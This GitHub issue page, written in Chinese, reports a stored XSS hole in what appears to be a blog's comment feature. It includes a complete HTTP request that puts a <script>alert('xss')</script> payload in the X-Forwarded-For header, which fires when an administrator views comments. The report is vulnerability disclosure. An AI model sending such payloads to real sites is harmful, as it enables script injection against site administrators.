未过滤header头IP信息可导致XSS漏洞 #55
Comments
|
统一用户能对入库的数据进行过滤 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
{{ message }}
|
统一用户能对入库的数据进行过滤 |
发一个HTTP请求如下:
POST /post/addComment HTTP/1.1
Host: hostname.cc:8080
Content-Length: 87
Cache-Control: max-age=0
Origin: http://hostname.cc:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Referer: http://x.cc:8080/post/hello-world
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
X-forwarded-for:<script>alert('xss')</script>
Connection: close
userComment=asd&userName=asd&userMail=asd&webHome=asd&submit=%E6%8F%90%E4%BA%A4&logId=1
后台查看评论列表就直接触发了.
这里获取header头IP时进行过滤下.
The text was updated successfully, but these errors were encountered: